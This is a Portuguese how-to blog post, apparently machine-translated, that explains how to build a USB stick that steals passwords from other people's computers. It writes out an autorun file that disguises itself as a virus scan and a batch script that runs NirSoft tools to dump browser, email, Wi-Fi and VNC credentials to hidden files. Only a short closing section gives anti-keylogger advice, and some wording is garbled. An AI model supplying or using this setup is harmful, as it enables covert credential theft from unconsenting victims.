Como criar uma memória USB para roubar dados para extrair informações e senhas de um computador? Guia passo a passo

Última actualización: novembro 29, 2023
Autor: cwyfi
Como criar uma memória USB para roubar dados para extrair informações e senhas de um computador? Guia passo a passo 1

A tecnologia avançou tanto que uma maneira de roubar ou gravar informações foi desenvolvida de maneira furtiva em qualquer computador . Esse método é chamado de keylogging e pode ser benéfico ou malicioso, dependendo do uso que lhe é dado, pois se você é um dos que baixa programas ou introduz dispositivos USB no computador constantemente, pode ser vítima disso.

Há pessoas que usam esse método de forma benéfica. Por exemplo, as empresas usam keyloggers para registrar e ver o progresso do trabalho de seus funcionários, sem precisar solicitar relatórios constantemente. Essa é uma maneira de organizar e otimizar ao máximo o trabalho de escritório . No entanto, é um assunto tão delicado que só pode ser feito com o consentimento do funcionário e com certas limitações para proteger as informações pessoais.

Se você quiser aprender, hoje ensinaremos a configurar seu USB para que você possa roubar dados do pendrive , além de ensinar como evitar esse tipo de eventualidade, pois, como vítima, estamos falando de algo muito sério, que pode ser causando perda de correio e em casos extremos de dinheiro em contas bancárias. Portanto, tome nota e torne-se um especialista no assunto.

Para que serve um USB Keylogger “rouba dados” ou os chamados “Ladrões” de informações?

Como criar uma memória USB para roubar dados para extrair informações e senhas de um computador? Guia passo a passo 2

Um keylogger também é conhecido como sensor de pressionamento de tecla ou rouba dados. Este é um programa ou é responsável por salvar ou gravar tudo o que você escreve ao usar o teclado. Tudo o que você coleta salva imediatamente em um arquivo ou também pode ser programado para que as informações sejam enviadas on-line para um e-mail diariamente ou semanalmente automaticamente.

Existem duas maneiras de fazer isso. O primeiro é o keylogger de software (o mais usado), que faz parte de malware como cavalos de Troia ou rootkits. Isso pode ser enviado por e-mail ou qualquer outro arquivo baixado da internet. O segundo é o keylogger de hardware (que não é muito comum), que consiste em infectar um disco USB removível com o programa e inseri-lo no computador que deseja extrair os dados .

Com este programa, já instalado em um computador, ele pode registrar e memorizar tudo o que você escreve com o teclado, como se estivesse escrevendo diretamente nele. Os exercícios cibernéticos podem roubar muitas informações confidenciais sem serem descobertos com esse método .

Relacionado:  Como ativar ou desativar os recursos opcionais do Windows 10? Guia passo a passo

Escusado será dizer que nem sempre um keylogger pode ser um malware prejudicial ao seu PC, pois existem algumas empresas que oferecem esse tipo de serviço para que o cliente tenha algum controle de seus computadores quando usado por outros, e também é amplamente utilizado pelos pais para monitorar o que seus filhos fazem.

Etapas para criar uma memória USB portátil e extrair dados e informações valiosos

Hoje, explicaremos como criar um USB que execute e recupere automaticamente ou salve automaticamente todas as informações no seu computador , apenas conectando-o ao seu PC, sem a necessidade de reproduzir nada, e também inclui uma função de keylogger que grava em um arquivo com extensão .txt, tudo o que você pressiona no teclado enquanto o USB está conectado ao PC.

Primeiro você precisa inserir o pendrive para formatá-lo, clicar com o botão direito do mouse na unidade e, em formatação, você pode formatá-lo em NTFS ou FAT32 , embora o último seja o mais recomendado.

Como criar uma memória USB para roubar dados para extrair informações e senhas de um computador? Guia passo a passo 3

Você abre o notebook ou outro programa similar e escreve o seguinte:

[autorun] 
open = launch.bat
UseAutoPlay = 1 
ACTION = Verificando com o VirusScan

Salve o arquivo, dando-lhe o nome AUTORUN.inf e deixe-o dentro do USB. Você volta ao notebook para criar outro arquivo, desta vez escrevendo o seguinte:

iniciar mspass.exe / stext mspass.txt 
iniciar mailpv.exe / stext mailpv.txt 
iniciar iepv.exe / stext iepv.txt 
iniciar pspv.exe / stext pspv.txt 
iniciar PasswordFox.exe / stext passwordfox.txt 
iniciar OperaPassView.exe / stext OperaPassView.txt 
start ChromePass.exe / stext ChromePass.txt 
start Dialupass.exe / stext Dialupass.txt 
start netpass.exe / stext netpass.txt 
start WirelessKeyView.exe / stext WirelessKeyView.txt 
start BulletsPassView.exe / stext BulletsPassView.txt 
start VNCPassView.exe / stext VNCPassView.txt 
start OpenedFilesView.exe / stext OpenedFilesView.txt 
start ProduKey.exe / stext ProduKey.txt 
start USBDeview.exe / stext USBDeview.txt

Em seguida, salve o arquivo com o nome LAUNCH.bat e também o deixe no USB.

“ATUALIZADO ✅ Você precisa criar um dispositivo portátil para subtrair senhas de outros computadores e não sabe como fazê-lo? ⭐ ENTRE AQUI ⭐ e descubra como isso é feito passo a passo com este TUTORIAL ✅ FÁCIL e RÁPIDO ✅”

Depois de criar os dois arquivos, é hora de baixar alguns complementos para tornar seu USB um espião cibernético que pode roubar informações dos sistemas de segurança mais rigorosos.

Visite o site da Nirsoft.net para baixar os seguintes utilitários:

Você deve descompactá-los na raiz do USB e parece que você pode ver na imagem:

Como criar uma memória USB para roubar dados para extrair informações e senhas de um computador? Guia passo a passo 4

Agora descompacte todas as ferramentas e oculte todos os arquivos , da seguinte maneira:

Como criar uma memória USB para roubar dados para extrair informações e senhas de um computador? Guia passo a passo 5

Você remove o USB do computador e o reinsere, para verificar se está funcionando. Se tudo correu bem, as seguintes linhas aparecerão no arquivo .txt .

Como criar uma memória USB para roubar dados para extrair informações e senhas de um computador? Guia passo a passo 6

Como impedir que um dispositivo USB roube as senhas e informações do computador?

Proteger-se dessa ameaça de computador não é mais um problema, e as medidas de proteção são muito simples e também ajudam a se proteger de outras ameaças.

Para evitar o keylogger, você terá que seguir os conselhos que deixaremos abaixo:

  • Use um bom antivírus , como eu disse antes, que seja reconhecido como um malware, que rouba informações do seu sistema. Com um antivírus atualizado constantemente, você pode evitar esses tipos de ameaças.
  • Se você digitar um PC que não é pessoal e entrar no sistema on-line de um banco, use os teclados virtuais que a mesma página oferece . Este é um teclado que apenas aparece na tela e você seleciona as teclas com a ajuda do mouse.
  • Use um firewall para fortalecer a defesa do seu computador contra keyloggers, pois ele monitora sua atividade de navegação. Quando detecta que as informações estão sendo extraídas e enviadas para fora do equipamento, geralmente solicita uma permissão ou mostra um aviso. Alguns softwares de firewall, como o ZoneAlarm, permitem fechar todos os dados de entrada e saída na sua totalidade.
  • Instalar um administrador para suas senhas , um ponto fraco do keylogger, é o fato de ele não poder armazenar dados que não foram gravados. É aí que o preenchimento automático de senha se torna muito útil.
  • Atualize constantemente o software do seu computador.  É a melhor idéia que você pode fazer, pois atualizá-lo melhora a segurança e a manutenção do software. Você pode visitar o F-secure para conhecer as vulnerabilidades.
  • Altere sua senha com frequência , pois dessa forma as informações que podem ser roubadas sempre permanecerão desatualizadas e, por esse motivo, elas não poderão acessar suas contas bancárias, e-mails ou outra conta pessoal.
  • Não baixe nenhum software pirata ou que não lhe cause muita confiança, pois eles vêm com esses tipos de vírus que infectam seu sistema com o único objetivo de roubar todas as informações que você possui.
  • Para executar tarefas diárias discretas, use um perfil de privilégio limitado  no sistema operacional do seu computador.
  • Sempre faça backup dos seus dados , para evitar a perda de dados , caso sua conta esteja muito comprometida.
  • Para melhorar sua segurança, use a autenticação de dois fatores , que protegerá suas contas e, mesmo que alguém queira descobrir suas senhas, isso evita que você tenha que digitar o código secreto que chegará ao seu celular ou e-mail.

Além dessas dicas, você pode usar qualquer uma das seguintes ferramentas para detectar keyloggers e bloqueá-los instantaneamente, para que todas as suas informações estejam sempre protegidas .

  • GuardedID : É um programa que fornece proteção poderosa contra keyloggers. O sistema GuardedID possui uma forma moderna de criptografia de pressionamento de teclas e sua tecnologia anti-keylogger protege você contra roubo de identidade.
  • AntiLogger : Este é um poderoso anti-keylogger com proteção proativa e com uma tecnologia para backup de arquivos na nuvem. Faz uma análise completa do comportamento, que monitora a cada momento todos os elementos e isola aqueles que parecem suspeitos.
  • KeyScrambler : É um pequeno programa que fornece criptografia rápida e precisa dos dados, inseridos pelo usuário enquanto trabalha no computador.
  • NextGen AntiKeylogger : Este programa elimina o keylogger, que intercepta dados do teclado ou de qualquer outro programa que deseja roubar suas informações e precisa de supervisão constante ou isolá-las em um estado de quarentena.
  • Detector de keylogger : com este programa, você não precisará mais se preocupar com nenhum tipo de keylogger, incluindo keyloggers de malware comercial. Este maravilhoso software não apenas os detecta, mas também os remove de suas raízes, para que não o incomodem novamente.
  • SpyShelterStop-Logger : Com este fabuloso programa ou o malware de keylogger mais complexo que existe, você pode ficar no seu computador, pois faz uma análise muito profunda, para ver se ele pode ser alterado e fornecer uma solução imediatamente.

Se você tiver alguma dúvida, deixe-a nos comentários, responderemos o mais breve possível, e certamente será de grande ajuda para mais membros da comunidade. Obrigado!

 

Você pode estar interessado:

Deixe um comentário